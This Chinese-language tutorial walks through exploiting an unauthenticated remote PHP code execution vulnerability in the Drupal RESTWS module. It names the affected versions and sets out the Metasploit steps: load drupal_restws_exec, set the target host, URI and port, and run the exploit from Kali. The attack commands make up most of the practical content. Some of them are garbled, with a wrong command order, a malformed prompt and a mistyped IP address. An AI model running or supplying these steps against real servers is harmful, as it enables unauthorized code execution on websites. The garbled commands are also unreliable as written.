Drupal插件漏洞实战:利用restws模块进行远程php代码执行(Drupal远程代码执行漏洞)

此模块利用Drupal RESTWS模块中的远程PHP代码执行漏洞。未经身份验证的用户可以在Web服务器用户的上下文中执行任意代码。RESTWS更改实体的默认页面回调以提供其他功能。此方法中的漏洞允许未经身份验证的攻击者发送特制请求,从而导致任意执行PHP。在1.7版本之前的2.6和1.x之前的RESTWS 2.x受到问题的影响。在Ubuntu服务器上安装了Drupal 7.5,对该模块进行了RESTWS 2.5测试。
利用目标
RESTWS 2.x
需求
攻击者:kali Linux
受害者PC:drupal
打开Kali终端类型  msfconsole
利用restws模块进行远程php代码执行
现在输入  exploit use / unix / webapp / drupal_restws_exec
msf exploit  (drupal_restws_exec)> set targeturi /
msf exploitdrupal_restws_exec)> set rhost 192.168。0.4  (远程主机的IP)
msf exploitdrupal_restws_exec)> set rport 80
msf exploitdrupal_restws_exec)> exploit
利用restws模块进行远程php代码执行
转载请注明本文链接: http://www.mayidui.net/t2310.html
游客
登录后才可以回帖,登录 或者 注册